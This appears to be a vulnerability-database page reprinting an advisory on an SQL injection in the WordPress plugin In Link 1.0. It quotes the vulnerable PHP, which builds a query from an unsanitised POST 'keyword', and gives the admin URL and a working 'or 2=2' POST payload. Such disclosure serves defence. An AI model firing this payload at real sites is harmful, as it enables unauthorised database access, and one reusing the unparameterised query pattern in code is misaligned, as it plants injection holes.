Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress In Link 1.0 SQL Injection Vulnerability

🗓️ 22 Nov 2017 00:00:00Reported by Dimopoulos EliasType 
zdt
 zdt🔗 0day.today👁 29 Views

WordPress In Link 1.0 SQL Injection Vulnerabilit

Code
Vulnerability Type:

SQL injection is POST parameter "keyword"

Affected plugin:
---------------------------------------
In Link
Version: 1.0
Requires WordPress Version: 2.8 or higher
Compatible up to: 2.8
URL: https://wordpress.org/plugins/inlinks/
(plugin has been closed after the report)
---------------------------------------

Affected file inlinks/inlinks.php

Affected lines:

58     $Keyword = trim($_POST['keyword']);
  59     $URL = trim($_POST['url']);
  60     $Rel = trim($_POST['rel']);
  61     $Target = trim($_POST['target']);
  62     $table_name = $wpdb->prefix ."URLKeywordsMapping";
  63     $SelectKeywordURLMappingDetails = "select * from $table_name 
where FldKeyword LIKE '".$Keyword."'" ;
  64
  65     $KeywordURLMappingDetails = 
$wpdb->get_results($SelectKeywordURLMappingDetails);
  66
  67     if(count($KeywordURLMappingDetails))
  68     {
  69         $Message = "<div align='center' style=\"color:red; 
font-weight:bold;\">The keyword <i>".$Keyword."</i> already exists in 
the table.</div>";
  70     }

More issues seems to exist in the plugin, because of lack of input 
validation and the lack of use of prepared statements.

Affected URL:

/wp-admin/options-general.php?page=inlinks%2Finlinks.php

POST Parameters (with payload):
keyword=gweeperx'or+2=2--+-&url=http%3A%2F%2F127.0.0.4&rel=nofollow&target=_blank&ActionType=AddKeywordURL&Add=Add

Tested against:

  * In Link 1.0
  * WordPress 4.9
  * mysql  Ver 14.14 Distrib 5.7.20, for Linux (x86_64) using EditLine
    wrapper
  * PHP 7.0.22-0ubuntu0.16.04.1

#  0day.today [2018-03-20]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Nov 2017 00:00Current
8.1High risk
Vulners AI Score8.1
wordpressin linksql injectionpost parameterkeywordpluginversion 1.0securityvulnerabilityaffected fileinlinks.phpinput validationprepared statementsaffected urlpost parameterstested against
29